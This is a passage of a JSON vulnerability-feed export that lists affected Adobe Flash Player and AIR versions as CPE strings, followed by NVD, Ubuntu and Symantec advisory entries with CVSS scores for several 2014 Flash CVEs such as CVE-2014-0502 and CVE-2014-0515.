"cpe:2.3:a:adobe:flash_player:11.2.202.332:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3690:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19480:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.280:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.242:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.180:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.335:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.327:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.600:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.1.8210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.270:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.168:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.135:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.110:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.2.0.2070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.50:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.117:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.136:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.2.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.236:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1953:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.6.0.597:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.58:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.285:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.252:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.224:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.258:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1628:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.6.602.171:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9130:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1030:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.238:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.336:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.251:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.310:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.8.800.94:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.6090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.3.0.3670:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.4.402.278:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.62:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.1.0.488:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0.1.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.1948:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.275:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1.0.5790:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3.13070:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.890:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.5.1.17730:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.4880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.9.0.1210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0.8.4990:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.102.59:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2710:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2.12610:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.271:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.0.7220:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.9.900.170:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.880:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.7.0.19530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.3.300.265:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:4.0.0.1390:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.7.0.1860:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.297:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.7.700.202:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.3.0.3650:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.4080:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.8.0.870:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.111.44:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.5.502.146:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.1530:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.5.0.1060:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.9.0.1380:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.1.0.485:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.1.115.54:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.261:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6.0.19140:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.4.0.2540:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air_sdk:3.6.0.599:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3.9120:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.262:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.7.0.2090:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:12.0.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:3.0.0.408:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T14:02:22", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before 12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows attackers to read the clipboard via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T05:15:00", "type": "cve", "title": "CVE-2014-0504", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0504"], "modified": "2018-12-13T16:00:00", "cpe": [], "id": "CVE-2014-0504", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0504", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-09-20T13:43:34", "description": "Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T05:06:00", "type": "cve", "title": "CVE-2014-0498", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2018-12-13T15:54:00", "cpe": [], "id": "CVE-2014-0498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-09-20T13:56:13", "description": "Use-after-free vulnerability in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows remote attackers to execute arbitrary code, and possibly bypass an Internet Explorer sandbox protection mechanism, via unspecified vectors, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2014.", "cvss3": {}, "published": "2014-03-27T10:55:00", "type": "cve", "title": "CVE-2014-0506", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506"], "modified": "2017-12-16T02:29:00", "cpe": ["cpe:/a:adobe:flash_player:12.0.0.77"], "id": "CVE-2014-0506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0506", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:12.0.0.77:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-20T14:02:54", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before 12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows remote attackers to bypass the Same Origin Policy via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T05:15:00", "type": "cve", "title": "CVE-2014-0503", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2018-12-13T16:00:00", "cpe": [], "id": "CVE-2014-0503", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0503", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-09-20T13:46:35", "description": "Double free vulnerability in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in February 2014.", "cvss3": {}, "published": "2014-02-21T05:07:00", "type": "cve", "title": "CVE-2014-0502", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0502"], "modified": "2018-12-13T15:55:00", "cpe": [], "id": "CVE-2014-0502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "ubuntucve": [{"lastseen": "2023-09-21T07:10:04", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x\nthrough 13.0.x before 13.0.0.206 on Windows and OS X, and before\n11.2.202.356 on Linux, allows remote attackers to execute arbitrary code\nvia unspecified vectors, as exploited in the wild in April 2014.", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-0515", "href": "https://ubuntu.com/security/CVE-2014-0515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T08:16:23", "description": "Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before\n13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR\nbefore 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR\nSDK & Compiler before 13.0.0.83 allow attackers to bypass intended access\nrestrictions and obtain sensitive information via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0508", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-08T00:00:00", "id": "UB:CVE-2014-0508", "href": "https://ubuntu.com/security/CVE-2014-0508", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-21T09:45:31", "description": "Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and\n11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before\n11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR\nSDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628\nallows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498"], "modified": "2014-02-21T00:00:00", "id": "UB:CVE-2014-0498", "href": "https://ubuntu.com/security/CVE-2014-0498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T08:16:10", "description": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player before\n11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS\nX and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android,\nAdobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before\n13.0.0.83 allows remote attackers to inject arbitrary web script or HTML\nvia unspecified vectors.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0509", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0509"], "modified": "2014-04-08T00:00:00", "id": "UB:CVE-2014-0509", "href": "https://ubuntu.com/security/CVE-2014-0509", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-09-21T08:16:41", "description": "Buffer overflow in Adobe Flash Player before 11.7.700.275 and 11.8.x\nthrough 13.0.x before 13.0.0.182 on Windows and OS X and before\n11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK\nbefore 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows\nattackers to execute arbitrary code via unspecified vectors.", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0507", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-08T00:00:00", "id": "UB:CVE-2014-0507", "href": "https://ubuntu.com/security/CVE-2014-0507", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-21T09:55:43", "description": "Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before\n12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe\nAIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and\nAdobe AIR SDK & Compiler before 4.0.0.1628 do not prevent access to address\ninformation, which makes it easier for attackers to bypass the ASLR\nprotection mechanism via unspecified vectors.", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0499"], "modified": "2014-02-21T00:00:00", "id": "UB:CVE-2014-0499", "href": "https://ubuntu.com/security/CVE-2014-0499", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-09-21T09:17:32", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before\n12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows\nattackers to read the clipboard via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0504", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0504"], "modified": "2014-03-12T00:00:00", "id": "UB:CVE-2014-0504", "href": "https://ubuntu.com/security/CVE-2014-0504", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-21T09:17:32", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before\n12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows\nremote attackers to bypass the Same Origin Policy via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0503", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2014-03-12T00:00:00", "id": "UB:CVE-2014-0503", "href": "https://ubuntu.com/security/CVE-2014-0503", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-21T09:45:05", "description": "Double free vulnerability in Adobe Flash Player before 11.7.700.269 and\n11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before\n11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR\nSDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628\nallows remote attackers to execute arbitrary code via unspecified vectors,\nas exploited in the wild in February 2014.", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0502", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-21T00:00:00", "id": "UB:CVE-2014-0502", "href": "https://ubuntu.com/security/CVE-2014-0502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T18:45:55", "description": "### Description\n\nAdobe Flash Player is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 